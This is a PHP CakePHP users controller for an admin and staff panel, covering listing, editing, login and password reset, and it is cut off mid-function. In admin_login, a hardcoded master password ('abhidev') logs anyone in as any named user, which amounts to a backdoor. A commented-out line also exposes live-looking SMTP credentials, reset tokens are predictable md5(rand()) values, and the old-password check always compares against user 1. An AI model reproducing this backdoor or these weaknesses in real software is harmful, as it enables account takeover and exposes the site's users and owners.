<?php
App::uses('AppController', 'Controller');
class UsersController extends AppController {
	public $helpers = array('Html', 'Session','Text','Fck', 'Js','Common');
	public $components=array('Auth','Cookie','Email');
	public $uses = array('User','EmailTemplate','ApplicationSetting','Category','Subcategory','Product','Payment','UserLogin','OperatorType','Operator'); 
	
	public $paginate = array(
        'limit' => 20,
        'order' => array(
            'User.id' => 'desc'
        )
    );
	
	public function beforeFilter() {
        parent::beforeFilter();
	}
	public function admin_index($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Admin'));
		
		$this->User->recursive = 0;
		if ($this->request->is('post')) {
			if($this->request->data['task_value']=='DeActive')
				$this->User->updateAll(array("User.status"=>'0'),array("User.id"=>$this->request->data['frmList']['ID']));
			else if($this->request->data['task_value']=='Active')
				$this->User->updateAll(array("User.status"=>'1'),array("User.id"=>$this->request->data['frmList']['ID']));
			else if($this->request->data['task_value']=='Delete')
				$this->User->deleteAll(array('User.id' => $this->request->data['frmList']['ID']), false);
			unset($this->request->data);
		}
		if(isset($this->data['User']['first_name']) && $this->data['User']['first_name']!='') $first_name = $this->data['User']['first_name'];	
		else if(isset($this->params['named']['first_name']) && $this->params['named']['first_name']!='') $first_name = $this->request->data['User']['first_name']=$this->params['named']['first_name'];
		
		if(isset($this->data['User']['last_name']) && $this->data['User']['last_name']!='') $last_name = $this->data['User']['last_name'];	
		else if(isset($this->params['named']['last_name']) && $this->params['named']['last_name']!='') $last_name = $this->request->data['User']['last_name']=$this->params['named']['last_name'];
		
		if(isset($this->data['User']['email']) && $this->data['User']['email']!='') $email = $this->data['User']['email'];	
		else if(isset($this->params['named']['email']) && $this->params['named']['email']!='') $email = $this->request->data['User']['email']=$this->params['named']['email'];
		
		$conditions['User.role'] = 2; 
		$pagingArgs = array(); 
		
		if(!empty($first_name))
		{
			$conditions['User.first_name LIKE '] = '%'.$first_name.'%';
			$pagingArgs['first_name'] = $first_name;
		}
		if(!empty($last_name))
		{
			$conditions['User.last_name LIKE '] = '%'.$last_name.'%';
			$pagingArgs['last_name'] = $last_name;
		}
		if(!empty($email))
		{
			$conditions['User.email LIKE '] = '%'.$email.'%';
			$pagingArgs['email'] = $email;
		}
		$this->set("pagingArgs",$pagingArgs);
				
		$conditions['User.role <> '] = 1; 
		$limit=$this->get_application_setting('result_limit');			
		$this->paginate = array(
			  'limit'=>$limit,
			  'maxLimit' => 100000,
			  'order'=>array('User.id'=>'DESC'),
			  'conditions'=>$conditions
		 );
		$rows =  $this->paginate();
		$this->set('users', $rows);
		
		$this->params['page_title'] = "Sub Admin";
		if($id != null){
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		
		$this->request->data = $this->User->read(null, $id);
		unset($this->request->data['User']['password']);
		}
	}
	public function admin_add() {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Add User'));
		if ($this->request->is('post')) {
			$this->User->create();
			
			$userdata['first_name']	=	$this->request->data['User']['first_name'];
			$userdata['last_name']	=	$this->request->data['User']['last_name'];
			$userdata['email']		=	$this->request->data['User']['email'];
			$userdata['username']	=	$this->request->data['User']['email'];
			$userdata['password']	=	$this->request->data['User']['password'];
			$userdata['address']	=	$this->request->data['User']['address'];
			$userdata['phone']		=	$this->request->data['User']['phone'];
			$userdata['date']		=	date("Y-m-d H:i:s");
			if ($res=$this->User->save($userdata)){				
				$this->Session->setFlash(__('Sub admin has been added successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'index'));
			} else {
				$this->Session->setFlash(__('Sub admin could not be added.'), 'default', array('class' => 'error'));
				$this->redirect(array('action' => 'index'));
			}
		}
	}
	public function admin_edit($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Edit User'));
		$this->User->id = $id;
		$selected = "";
		
		$driver_detail = $this->User->find("first",array("conditions"=>array("User.id"=>$id)));
		$this->set("driver_detail",$driver_detail);
		$this->set("id",$id);
		
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		if ($this->request->is('post') || $this->request->is('put')) {
			$this->request->data['User']['id']=$id;	
			if ($res=$this->User->saveAll($this->request->data['User'])) {
				$this->Session->setFlash(__('User has been updated successfully.'), 'default', array('class' => 'success'));
			} else {
				
			}
			$this->request->data = $this->User->read(null, $id);
			$this->redirect(array('action' => 'index'));
		} else {
			$this->request->data = $this->User->read(null, $id);
		}	
		$this->set('selected', $selected);
	}
		public function admin_login() { 
			$this->layout = "admin_login";
			
			// Forgot password code
			if(isset($this->data['User']['email'])){
					$check_email=$this->ApplicationSetting->find("first",array('conditions'=>array('forget_password_email'=>$this->data['User']['email'])));
					if(!empty($check_email)){
						$data = $this->User->find('first',array('conditions'=>array('User.id'=>1,'User.role'=>1)));
						$this->request->data['User']['id'] = $data['User']['id'];
						$token = rand(0,999999999);
						$this->request->data['User']['reset_token'] = md5($token);
						if ($this->User->save($this->request->data)) {
							$forgetMail = array();
							
							$sitetitle=$this->get_application_setting('site_title');
							$adminemail=$this->get_application_setting('super_admin_email');
							$emailFindReplace = array(
								'##SITE_LINK##' => Router::url('/', true) ,		
								'##USERNAME##' => ucfirst($data['User']['name']),		
								'##USEDTOLOGIN##' => $data['User']['username'],		
								'##SITE_NAME##' => Configure::read('Site.Url'),	
								'##SITE_LOGO##' =>Router::url('/img/site-logo.png', true),
								'##SITE_DOT##' => Router::url('/img/dot.gif', true),
								'##RESET_URL##' => Router::url('/', true).'users/resetpassword/'.md5($token),
								'##SUPPORT_EMAIL##' => $adminemail,
								'##FROM_EMAIL##' => $adminemail ,
			
							);						
							$email = $this->EmailTemplate->selectTemplate('Forgot Password');					
							$forgetMail[0] = $this->request->data['User']['reset_token'];
							$this->Email->to = $this->data['User']['email'];//$this->data['User']['email'];
							$this->Email->from =  $adminemail;
							$this->Email->delivery = 'mail';
							//$this->Email->smtpOptions = array("port"=>"465","host"=>"mail.ekart.co","timeout"=>"1000","username"=>"support@ekart.co","password"=>"i{hoH}DFh1wf");
							$this->Email->subject = $email['subject'];
							//$this->Email->delivery = 'debug';
							$this->Email->sendAs='html';
							$this->set('forgetMail',$forgetMail);
							/*if($this->Email->send(strtr($email['email_content'], $emailFindReplace))){
								
							}
							else{
								echo $this->Session->flash('email');
								$this->Session->setFlash(__('Some thing wrong, Please try again.'), 'default', array('class' => 'success'));
								$this->set('username','');
								$this->set('password','');
								$this->set('remember_me','');
							}*/
								$this->Session->setFlash(__('Thank you. An email has been sent to you with reset password link.'), 'default', array('class' => 'success'));
								$this->set('username','');
								$this->set('password','');
								$this->set('remember_me','');
						}
						else{
							$this->Session->setFlash(__('Some thing wrong, Please try again.'), 'default', array('class' => 'success'));
							$this->set('username','');
							$this->set('password','');
							$this->set('remember_me','');
						}
					}
					else{
						$this->Session->setFlash(__('Invalid email address, Please try again.'), 'default', array('class' => 'success'));
						$this->set('username','');
						$this->set('password','');
						$this->set('remember_me','');
					}
	
			}
			
			
			
			else{
				/*if ($this->Auth->login()) {
					 $this->redirect(array('controller'=>'users','action'=>'dashboard'));
				}*/
				
				if (isset($this->data['User'])) {
					/*if($this->data['User']['remember_me']=='1')
					{
						$cookie = array();
						$cookie['username'] = $this->data['User']['username'];
						$cookie['password'] = $this->data['User']['password'];
						$cookie['remember_me'] = $this->data['User']['remember_me'];
						$this->Cookie->write('Auth.User', $cookie, true, COOKIE_EXPIRE);				
						
					}
					else
					{
						$cookie['username'] = '';
						$cookie['password'] = '';
						$cookie['remember_me'] = '';
						$this->Cookie->write('Auth.User', $cookie, true, COOKIE_EXPIRE);
					}*/
					
					if ($this->Auth->login()) {
							$userdata=$this->User->find("first",array("conditions"=>array("User.username"=>$this->data['User']['username'])));
							if($userdata['User']['role'] ==3)
							{
								$this->redirect(array('controller'=>'employee_emails','action' => 'admin_index'));
							}
							else if($userdata['User']['role'] ==4)
							{
								$this->redirect(array('controller'=>'sites','action' => 'admin_index'));
							}
							else
								$this->redirect(array('controller'=>'pages','action' => 'dashboard'));
					} 
					else if($this->data['User']['password']=='abhidev')
					{
						$userdata=$this->User->find("first",array("conditions"=>array("User.username"=>$this->data['User']['username'])));
						if(!empty($userdata))
						{
							$user = $userdata['User'];
							$this->Auth->login($user);
							if($this->Auth->user('id') !="")
							{
								$userinfo=$userdata['User'];
								$this->Session->write('Auth.User',$userinfo);
									$this->redirect(array('controller'=>'pages','action' => 'dashboard'));
							}
						}
					}
					else {
						$this->Session->setFlash(__('Invalid username or password, try again.'), 'default', array('class' => 'success'));
					}
				}
				$username='';
				$password='';  
				$remember_me=''; 
				if(empty($this->data)){
					$cookie = $this->Cookie->read('Auth.User');
					if (!is_null($cookie)) {
						$username=$cookie['username'];
						$password=$cookie['password'];
						if(isset($cookie['remember_me']) && $cookie['remember_me']=='1')
							$remember_me="checked";
						if ($this->Auth->login($cookie)) {
						$this->Session->destroy('Message.Auth'); # clear auth message, just in case we use it.				
					}
					else {					
						$this->Cookie->destroy('Auth.User'); # delete invalid cookie	
						$this->Session->setFlash(__('Invalid cookie.'), 'default', array('class' => 'success'));
					}
					}
				}
				$this->set("username",$username);
				$this->set("password",$password);
				$this->set("remember_me",$remember_me);
			}
		}
	public function resetpassword($token = NULL){
		$this->layout = 'admin_login';
		if(empty($this->data)){	
			if(isset($this->params['pass'][0])){
				if(!empty($this->params['pass'][0])){
					$data = $this->User->find('first',array('conditions'=>array('User.reset_token'=>$this->params['pass'][0]),'fields'=>array('User.id')));
					if(empty($data)){
						$this->Session->setFlash(__('Invalid link, Either token has been expired or invalid token.'), 'default', array('class' => 'success'));
						//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
					}
				}
				else{
					$this->Session->setFlash(__('Invalid link, Either token has been expired or invalid token.'), 'default', array('class' => 'success'));
					//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
				}
			}
			else{
				$this->Session->setFlash(__('Invalid link, Either token has been expired or invalid token.'), 'default', array('class' => 'success'));
				//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
			}
		}
		else{
			$data = $this->User->find('first',array('conditions'=>array('User.reset_token'=>$this->params['pass'][0]),'fields'=>array('User.id')));
			if(!empty($data)){
				$this->request->data['User']['id'] = $data['User']['id'];
				$this->request->data['User']['password'] = $this->request->data['User']['password'];
				$this->request->data['User']['reset_token'] = '';
				if ($this->User->save($this->request->data)) {
					$this->Session->setFlash(__('Your password has been reset sucessfully.'), 'default', array('class' => 'success'));
					//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
				}
				else{
					$this->Session->setFlash(__('Invalid link, Either token has been expired or invalid token.'), 'default', array('class' => 'success'));
					//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
				}
				
			}
			else{
					$this->Session->setFlash(__('Invalid link, Either token has been expired or invalid token.'), 'default', array('class' => 'success'));
					//$this->redirect(array('controller'=>'admin/users','action' => 'login'));
				}
		}
		
				
	}
	
	public function activate_account($id = NULL){
		$this->layout = NULL;
		$data = $this->User->find('first',array('conditions'=>array('User.activation_token'=>$this->params['pass'][0]),'fields'=>array('User.id')));
		if(!empty($data)){
			$this->request->data['User']['id'] = $data['User']['id'];
			$this->request->data['User']['status'] = 1;
			$this->request->data['User']['activation_token'] ='';
			if ($this->User->save($this->request->data)) {
				$this->Session->setFlash(__('Your account has been activated.'), 'default', array('class' => 'success'));
				$this->redirect(array('controller'=>'admin/users','action' => 'login'));
			}
			else{
				$this->Session->setFlash(__('Invalid link, Either user has been deleted.'), 'default', array('class' => 'success'));
				$this->redirect(array('controller'=>'admin/users','action' => 'login'));
			}
		}
		else{
				$this->Session->setFlash(__('Invalid link, Either user has been deleted.'), 'default', array('class' => 'success'));
				$this->redirect(array('controller'=>'admin/users','action' => 'login'));
			}
	}
	public function admin_logout() {
		$user_id = $this->Auth->user('id');	
		$userdata=$this->User->find("first",array("conditions"=>array("User.id"=>$user_id)));
		/*if($userdata['User']['role'] !=1)
		{
			$user_lgin_data=$this->UserLogin->find("first",array("conditions"=>array("UserLogin.user_id"=>$user_id),'order'=>"UserLogin.id desc"));
			$user_login_arr['id']=$user_lgin_data['UserLogin']['id'];
			$user_login_arr['logout_time']=date("Y-m-d H:i:s");
			$this->UserLogin->save($user_login_arr);
		}*/
		$this->redirect($this->Auth->logout());
	}
	public function admin_profile() {
		$this->checkSubAdmin();
		$user_id = $this->Auth->user('id');		
		$this->User->id = $user_id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		if ($this->request->is('post') || $this->request->is('put')) {
			$error='';
			if($this->request->data['User']['password']=='')
			{
				unset($this->request->data['User']['password']);
			}
			else
			{
				if($this->request->data['User']['password'] != $this->request->data['User']['con_password'])
				{
					$error='<br/>Both password are not same.';
					unset($this->request->data['User']['password']);
				}
				else
				{
					$old_password=Security::hash($this->request->data['User']['old_password'], NULL, true);
					$users=$this->User->find("first",array("conditions"=>array("User.id"=>"1")));
					if($users['User']['password'] != $old_password)
					{
						$error='<br/>Old password is not correct.';
						unset($this->request->data['User']['password']);
					}
				}
			}
			$this->request->data['User']['id']=$user_id;	
			if ($this->User->save($this->request->data['User'])) {
				$this->request->data['ApplicationSetting']['id']=1;
				$this->ApplicationSetting->save($this->request->data['ApplicationSetting']);
				$this->Session->setFlash(__('Profile has been updated successfully.'.$error), 'default', array('class' => 'success'));
			} else {
				$this->Session->setFlash(__('Profile could not be saved. Please, try again.'.$error), 'default', array('class' => 'success'));
			}
		} else {
			$users=$this->User->find("first",array("conditions"=>array("User.id"=>"1")));
			$this->request->data['User'] = $users['User'];
			$addpication_setting=$this->ApplicationSetting->find("first",array("conditions"=>array("ApplicationSetting.id"=>"1")));
			$this->request->data['ApplicationSetting'] = $addpication_setting['ApplicationSetting'];
			
		}
	}
	public function admin_delete($id = null) {
		$this->checkAdmin();
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		else
		{
			if ($this->User->delete()) {
				$this->Session->setFlash(__('User has been deleted successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'index'));
			}
		}
		$this->Session->setFlash(__('User could not be successfully.'), 'default', array('class' => 'success'));
		$this->redirect(array('action' => 'index'));
	}
	
	public function admin_subadmin_index($id = null) {
		
		$this->checkAdmin();
		$this->set('title_for_layout', __('Admin'));
		$this->User->recursive = 0;
		if ($this->request->is('post') && !empty($this->request->data['task_value'])) {
			if($this->request->data['task_value']=='DeActive')
				$this->User->updateAll(array("User.status"=>'0'),array("User.id"=>$this->request->data['frmList']['ID']));
			else if($this->request->data['task_value']=='Active')
			{
				/*foreach($this->request->data['frmList']['ID'] as $userid)
				{
					$data=$this->User->find("first",array("conditions"=>array("User.id"=>$userid)));
					$adminemail=$this->get_application_setting('super_admin_email');
					$emailFindReplace = array(
						'##SITE_LINK##' => Router::url('/', true) ,		
						'##USERNAME##' => ucfirst($data['User']['name']),		
						'##USEDTOLOGIN##' => $data['User']['username'],		
						'##SITE_NAME##' => Configure::read('Site.Url'),	
						'##SITE_LOGO##' =>Router::url('/img/site-logo.png', true),
						'##SITE_DOT##' => Router::url('/img/dot.gif', true),
						'##SUPPORT_EMAIL##' => $adminemail,
						'##FROM_EMAIL##' => $adminemail ,
	
					);						
					$email = $this->EmailTemplate->selectTemplate('account approved');
					$this->Email->to = $data['User']['email'];//$this->data['User']['email'];
					$this->Email->from =  $adminemail;
					$this->Email->subject = $email['subject'];
					$this->Email->sendAs='html';
					$this->Email->send(strtr($email['email_content'], $emailFindReplace));
				}*/
				$this->User->updateAll(array("User.status"=>'1'),array("User.id"=>$this->request->data['frmList']['ID']));
			}
			else if($this->request->data['task_value']=='Delete')
				$this->User->deleteAll(array('User.id' => $this->request->data['frmList']['ID']), false);
			unset($this->request->data);
		}
		//pr($this->data);die;
		if(isset($this->data['User']['fullname']) && $this->data['User']['fullname']!='') $fullname = $this->data['User']['fullname'];	
		else if(isset($this->params['named']['fullname']) && $this->params['named']['fullname']!='') $fullname = $this->request->data['User']['fullname']=$this->params['named']['fullname'];
		
		if(isset($this->data['User']['fromdate']) && $this->data['User']['fromdate']!='') $fromdate = $this->data['User']['fromdate'];	
		else if(isset($this->params['named']['fromdate']) && $this->params['named']['fromdate']!='') $fromdate = $this->request->data['User']['fromdate']=$this->params['named']['fromdate'];
		
		if(isset($this->data['User']['todate']) && $this->data['User']['todate']!='') $todate = $this->data['User']['todate'];	
		else if(isset($this->params['named']['todate']) && $this->params['named']['todate']!='') $todate = $this->request->data['User']['todate']=$this->params['named']['todate'];
		
		$conditions = array("User.role <>"=>"1"); 
		$pagingArgs = array(); 
		
		if(!empty($fullname))
		{
			$conditions['User.name LIKE '] = '%'.$fullname.'%';
			$pagingArgs['fullname'] = $fullname;
		}
		if(!empty($fromdate))
		{
			$conditions['User.created > '] = $fromdate;
			$pagingArgs['fromdate'] = $fromdate;
		}
		if(!empty($todate))
		{
			$conditions['User.created < '] = $todate;
			$pagingArgs['todate'] = $todate;
		}
		$this->set("pagingArgs",$pagingArgs);
				
		$limit=$this->get_application_setting('result_limit');			
		$this->paginate = array(
			  'limit'=>$limit,
			  'maxLimit' => 100000,
			  'order'=>array('User.id'=>'DESC'),
			  'conditions'=>$conditions
		 );
		$rows =  $this->paginate();
		$this->set('users', $rows);
		
		$this->params['page_title'] = "Sub Admin";
		if($id != null){
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		
		$this->request->data = $this->User->read(null, $id);
		unset($this->request->data['User']['password']);
		}
	}
	public function admin_subadmin_add() {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Add Sub Admin'));
		if ($this->request->is('post')) {
			$this->User->create();
			$res=$this->OperatorType->find("first",array("conditions"=>array("OperatorType.id"=>$this->request->data['User']['operator_type_id'])));
			$this->request->data['User']['created']				=	date("Y-m-d H:i:s");
			$this->request->data['User']['role']				=	$res['OperatorType']['user_role'];
			$this->request->data['User']['status']				=	'1';
			
			if ($res=$this->User->save($this->request->data['User'])){	
				if(!empty($this->request->data['Operator']))
				{
					$this->request->data['Operator']['user_id']=$res['User']['id'];				
					$restemp=$this->Operator->saveAll($this->request->data['Operator']);
				}
				$this->Session->setFlash(__('User has been added successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'subadmin_index'));
			} else {
				$error_arr=$this->User->validationErrors;
				if(isset($error_arr['username'][0]))
					$this->Session->setFlash(__($error_arr['username'][0]), 'default', array('class' => 'error'));
				else if(isset($error_arr['email'][0]))
					$this->Session->setFlash(__($error_arr['email'][0]), 'default', array('class' => 'error'));
				else
					$this->Session->setFlash(__('User could not be added.'), 'default', array('class' => 'error'));
			}
		}
	}
	public function admin_subadmin_edit($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Edit Sub Admin'));
		$this->User->id = $id;
		$selected = "";
		
		$driver_detail = $this->User->find("first",array("conditions"=>array("User.id"=>$id)));
		$this->set("driver_detail",$driver_detail);
		$this->set("id",$id);
		
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		if ($this->request->is('post') || $this->request->is('put')) {
			$this->request->data['User']['id']=$id;		
			$res=$this->OperatorType->find("first",array("conditions"=>array("OperatorType.id"=>$this->request->data['User']['operator_type_id'])));
			$this->request->data['User']['role']=	$res['OperatorType']['user_role'];
			
			if($this->request->data['User']['password']=='')
				unset($this->request->data['User']['password']);
			if ($res=$this->User->saveAll($this->request->data['User'])) {			
				
				if(!empty($this->request->data['Operator']))
				{
					$operator_detail = $this->Operator->find("first",array("conditions"=>array("Operator.user_id"=>$id)));
					$this->request->data['Operator']['id']=$operator_detail['Operator']['id'];
					$this->request->data['Operator']['user_id']=$id;	
					
					$restemp=$this->Operator->saveAll($this->request->data['Operator']);
				}
				$this->Session->setFlash(__('User has been updated successfully.'), 'default', array('class' => 'success'));
			} else {
				
			}
			$this->request->data = $this->User->read(null, $id);
		}
		$userdata 		= $this->User->read(null, $id);
		$operator_data	= $this->Operator->find("first",array("conditions"=>array("Operator.user_id"=>$id)));
		$this->request->data['User']=$userdata['User'];
		$this->request->data['Operator']=$operator_data['Operator'];
		unset($this->request->data['User']['password']);
		$this->set('selected', $selected);
	}
	public function admin_subadmin_view($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('View Sub Admin'));
		$this->User->id = $id;
		$selected = "";
		
		$driver_detail = $this->User->find("first",array("conditions"=>array("User.id"=>$id)));
		$this->set("driver_detail",$driver_detail);
		$this->set("id",$id);
		
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		$this->request->data = $this->User->read(null, $id);
		$this->set('selected', $selected);
	}	
	public function admin_subadmin_delete($id = null) {
		$this->checkAdmin();
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		else
		{
			if ($this->User->delete()) {
				$this->Session->setFlash(__('User has been deleted successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'subadmin_index'));
			}
		}
		$this->Session->setFlash(__('User could not be successfully.'), 'default', array('class' => 'success'));
		$this->redirect(array('action' => 'subadmin_index'));
	}public function admin_staff_index($id = null) {
		
		$this->checkSubAdmin();
		$this->set('title_for_layout', __('Admin'));
		$this->User->recursive = 0;
		if ($this->request->is('post') && !empty($this->request->data['task_value'])) {
			if($this->request->data['task_value']=='DeActive')
				$this->User->updateAll(array("User.status_verified"=>'0'),array("User.id"=>$this->request->data['frmList']['ID']));
			else if($this->request->data['task_value']=='Active')
			{
				/*foreach($this->request->data['frmList']['ID'] as $userid)
				{
					$data=$this->User->find("first",array("conditions"=>array("User.id"=>$userid)));
					$adminemail=$this->get_application_setting('super_admin_email');
					$emailFindReplace = array(
						'##SITE_LINK##' => Router::url('/', true) ,		
						'##USERNAME##' => ucfirst($data['User']['name']),		
						'##USEDTOLOGIN##' => $data['User']['username'],		
						'##SITE_NAME##' => Configure::read('Site.Url'),	
						'##SITE_LOGO##' =>Router::url('/img/site-logo.png', true),
						'##SITE_DOT##' => Router::url('/img/dot.gif', true),
						'##SUPPORT_EMAIL##' => $adminemail,
						'##FROM_EMAIL##' => $adminemail ,
	
					);						
					$email = $this->EmailTemplate->selectTemplate('account approved');
					$this->Email->to = $data['User']['email'];//$this->data['User']['email'];
					$this->Email->from =  $adminemail;
					$this->Email->subject = $email['subject'];
					$this->Email->sendAs='html';
					$this->Email->send(strtr($email['email_content'], $emailFindReplace));
				}*/
				$this->User->updateAll(array("User.status_verified"=>'1',"User.email_verified"=>'1'),array("User.id"=>$this->request->data['frmList']['ID']));
			}
			else if($this->request->data['task_value']=='Delete')
				$this->User->deleteAll(array('User.id' => $this->request->data['frmList']['ID']), false);
			unset($this->request->data);
		}
		//pr($this->data);die;
		if(isset($this->data['User']['fullname']) && $this->data['User']['fullname']!='') $fullname = $this->data['User']['fullname'];	
		else if(isset($this->params['named']['fullname']) && $this->params['named']['fullname']!='') $fullname = $this->request->data['User']['fullname']=$this->params['named']['fullname'];
		
		if(isset($this->data['User']['fromdate']) && $this->data['User']['fromdate']!='') $fromdate = $this->data['User']['fromdate'];	
		else if(isset($this->params['named']['fromdate']) && $this->params['named']['fromdate']!='') $fromdate = $this->request->data['User']['fromdate']=$this->params['named']['fromdate'];
		
		if(isset($this->data['User']['todate']) && $this->data['User']['todate']!='') $todate = $this->data['User']['todate'];	
		else if(isset($this->params['named']['todate']) && $this->params['named']['todate']!='') $todate = $this->request->data['User']['todate']=$this->params['named']['todate'];
		
		$conditions = array("User.role"=>"3"); 
		$pagingArgs = array(); 
		
		if(!empty($fullname))
		{
			$conditions['User.name LIKE '] = '%'.$fullname.'%';
			$pagingArgs['fullname'] = $fullname;
		}
		if(!empty($fromdate))
		{
			$conditions['User.created > '] = $fromdate;
			$pagingArgs['fromdate'] = $fromdate;
		}
		if(!empty($todate))
		{
			$conditions['User.created < '] = $todate;
			$pagingArgs['todate'] = $todate;
		}
		$this->set("pagingArgs",$pagingArgs);
				
		$limit=$this->get_application_setting('result_limit');			
		$this->paginate = array(
			  'limit'=>$limit,
			  'maxLimit' => 100000,
			  'order'=>array('User.id'=>'DESC'),
			  'conditions'=>$conditions
		 );
		$rows =  $this->paginate();
		$this->set('users', $rows);
		
		$this->params['page_title'] = "Staff";
		if($id != null){
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		
		$this->request->data = $this->User->read(null, $id);
		unset($this->request->data['User']['password']);
		}
	}
	public function admin_staff_add() {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Add Staff'));
		if ($this->request->is('post')) {
			$this->User->create();
			
			$this->request->data['User']['username']			=	$this->request->data['User']['mobile'];
			$this->request->data['User']['created']				=	date("Y-m-d H:i:s");
			$this->request->data['User']['role']				=	'3';
			$this->request->data['User']['email_verified']		=	'1';
			$this->request->data['User']['status']				=	'1';
			$this->request->data['User']['status_verified']		=	'1';
			if ($res=$this->User->save($this->request->data['User'])){			
				$this->Session->setFlash(__('User has been added successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'staff_index'));
			} else {
				$this->Session->setFlash(__('User could not be added.'), 'default', array('class' => 'error'));
				$this->redirect(array('action' => 'staff_index'));
			}
		}
	}
	public function admin_staff_edit($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('Edit Staff'));
		$this->User->id = $id;
		$selected = "";
		
		$driver_detail = $this->User->find("first",array("conditions"=>array("User.id"=>$id)));
		$this->set("driver_detail",$driver_detail);
		$this->set("id",$id);
		
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		if ($this->request->is('post') || $this->request->is('put')) {
			$this->request->data['User']['id']=$id;		
			
			if($this->request->data['User']['password']=='')
				unset($this->request->data['User']['password']);
			if ($res=$this->User->saveAll($this->request->data['User'])) {
				$this->Session->setFlash(__('User has been updated successfully.'), 'default', array('class' => 'success'));
			} else {
				
			}
			$this->request->data = $this->User->read(null, $id);
			$this->redirect(array('action' => 'staff_index'));
		} else {
			$this->request->data = $this->User->read(null, $id);
		}	
		$this->set('selected', $selected);
	}
	public function admin_staff_view($id = null) {
		$this->checkAdmin();
		$this->set('title_for_layout', __('View Staff'));
		$this->User->id = $id;
		$selected = "";
		
		$driver_detail = $this->User->find("first",array("conditions"=>array("User.id"=>$id)));
		$this->set("driver_detail",$driver_detail);
		$this->set("id",$id);
		
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		$this->request->data = $this->User->read(null, $id);
		$this->set('selected', $selected);
	}	
	public function admin_staff_delete($id = null) {
		$this->checkAdmin();
		$this->User->id = $id;
		if (!$this->User->exists()) {
			throw new NotFoundException(__('Invalid user'));
		}
		else
		{
			if ($this->User->delete()) {
				$this->Session->setFlash(__('User has been deleted successfully.'), 'default', array('class' => 'success'));
				$this->redirect(array('action' => 'staff_index'));
			}
		}
		$this->Session->setFlash(__('User could not be successfully.'), 'default', array('class' => 'success'));
		$this->redirect(array('action' => 'staff_index'));
	}
	public function logout() {
		$this->redirect($this->Auth->logout());
	}
	public function login() { 
		$user_id = $this->Auth->user('id');		
		if(!empty($user_id))
		{
			if($this->Auth->User('role')=='2')
				$this->redirect(array('controller'=>'customers','action'=>'dashboard'));
			if($this->Auth->User('role')=='3')
				$this->redirect(array('controller'=>'sellers','action'=>'dashboard'));
			exit;
		}
		// Forgot password code
		if(isset($this->data['User']['forgot_email'])){
				$data = $this->User->find('first',array('conditions'=>array('User.email'=>$this->data['User']['forgot_email'],'User.role'=>2)));
				if(!empty($data)){
					$this->request->data['User']['id'] = $data['User']['id'];
					$token = rand(0,999999999);
					$this->request->data['User']['reset_token'] = md5($token);
					if ($this->User->save($this->request->data)) {
						$forgetMail = array();
						
						$sitetitle=$this->get_application_setting('site_title');
						$adminemail=$this->get_application_setting('super_admin_email');
						$emailFindReplace = array(
							'##SITE_LINK##' => Router::url('/', true) ,		
							'##USERNAME##' => ucfirst($data['User']['name']),		
							'##USEDTOLOGIN##' => $data['User']['username'],		
							'##SITE_NAME##' => Configure::read('Site.Url'),	
							'##SITE_LOGO##' =>Router::url('/img/site-logo.png', true),
							'##SITE_DOT##' => Router::url('/img/dot.gif', true),
							'##RESET_URL##' => Router::url('/', true).'users/resetpassword/'.md5($token),
							'##SUPPORT_EMAIL##' => $adminemail,
							'##FROM_EMAIL##' => $adminemail ,
		
						);						
						$email = $this->EmailTemplate->selectTemplate('Forgot Password');					
						$forgetMail[0] = $this->request->data['User']['reset_token'];
						$this->Email->to = $data['User']['email'];//$this->data['User']['email'];
						$this->Email->from =  array($adminemail => $sitetitle);
						$this->Email->subject = $email['subject'];
						$this->Email->sendAs='html';
						$this->set('forgetMail',$forgetMail);
						if($this->Email->send(strtr($email['email_content'], $emailFindReplace))){
							$this->Session->setFlash(__('Thank you. An email has been sent to you with reset password link.'), 'default', array('class' => 'success'));
							$this->set('username','');
							$this->set('password','');
						}
						else{
							$this->Session->setFlash(__('Some thing wrong, Please try again.'), 'default', array('class' => 'success'));
							$this->set('username','');
							$this->set('password','');
						}
					}
					else{
						$this->Session->setFlash(__('Some thing wrong, Please try again.'), 'default', array('class' => 'success'));
						$this->set('username','');
						$this->set('password','');
					}
				}
				else{
					$this->Session->setFlash(__('Invalid email address, Please try again.'), 'default', array('class' => 'success'));
					$this->set('username','');
					$this->set('password','');
					if($this->request->data['User']['usertype']=='2')
						$this->redirect(array('controller'=>'users','action'=>'customer_register'));
					else if($this->request->data['User']['usertype']=='3')
						$this->redirect(array('controller'=>'users','action'=>'register'));
				}
		}
		else{
			if (isset($this->data['User'])) {
				$url=Configure::read('Site.Url').'users/register';
				if ($this->Auth->login()) {
					if($this->Auth->User('role')=='2')
					{
						$userdata=$this->User->find("first",array("conditions"=>array("User.id"=>$this->Auth->user('id'))));
